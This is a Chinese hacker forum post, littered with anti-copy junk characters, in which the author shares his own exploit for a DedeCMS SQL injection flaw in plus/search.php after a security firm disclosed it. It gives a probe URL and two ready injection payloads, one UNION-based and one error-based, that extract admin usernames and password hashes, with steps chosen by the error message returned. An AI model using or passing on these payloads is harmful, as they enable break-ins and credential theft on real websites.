转载不加作者名的没JJ# p' M8 W) ^$ S8 |2 P" z0 E; y- \% ^, E
& i- S+ ^" ~- O$ G) i- A哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。) z1 w5 c+ u) z' }. O5 c. x
) e- r$ S i' k! j( s+ o4 ~
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
& i3 f' A8 D5 w6 B4 v+ v$ |7 ^5 m
2 j5 F& e3 B/ F6 y( R0 t我一般是这样测试的:" T- G2 B7 [1 j) x2 M
* ?( I9 c: S( `5 `( P提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a8 K3 K; a; a$ Z+ V; Z3 c4 D; C2 f
3 t$ s, o/ U U$ s9 Z/ g B' \转载不加作者名的没JJ$ B) \( x0 s$ F' R7 K V0 h0 c7 l
1 ]( v- w- x8 M t4 J作者:鬼哥# E* K- s/ ?0 _& R0 x# k1 ?/ i; K
7 o( S; }/ U$ D% Y6 b4 C. u
! Y7 v& F9 d; [ [0 x2 o6 Q
- b* r% I5 ^% W% |" z% y9 ~看结果如果提示- T2 c# ]4 w, n6 d& K5 [
6 {, d! t( X+ V {* J
Safe Alert: Request Error step 2 !
8 k# u ?, m* e8 _* M
! l- z1 s0 k8 ^/ R( c s那么直接用下面的exp
# D6 C2 T1 v) x! A6 B; Y! S/ |1 Z) T+ I7 l0 t: l# T; q) ?; W0 W
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
8 Y- K- ?' O1 v7 l' i7 N5 L( A4 s- @3 U9 `; e0 q O
: `! R8 p( A3 p6 v- ?1 x" I
看结果如果提示8 j( C; h" ^0 z
9 ?. I4 w/ c& A8 `4 L' u) O: M8 R
Safe Alert: Request Error step 1 !
" m H5 d0 b" I) `6 o! @! O
, n1 n0 u5 W; |7 Z% M那么直接用下面的exp2 N* n; z2 r1 N. m+ n2 W9 n- }+ k
/ o+ y- l* @2 E
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
& M# ?- `- |$ e& J
) H4 }1 r- v2 s6 r$ h8 }5 T# I- q5 Q K( M
如果正常显示证明漏洞不存在了。2 p7 F' }3 k5 M3 u: C. T6 H5 z- K
& K1 H. s6 o" `. e) ^5 `, Y转载不加作者名的没JJ |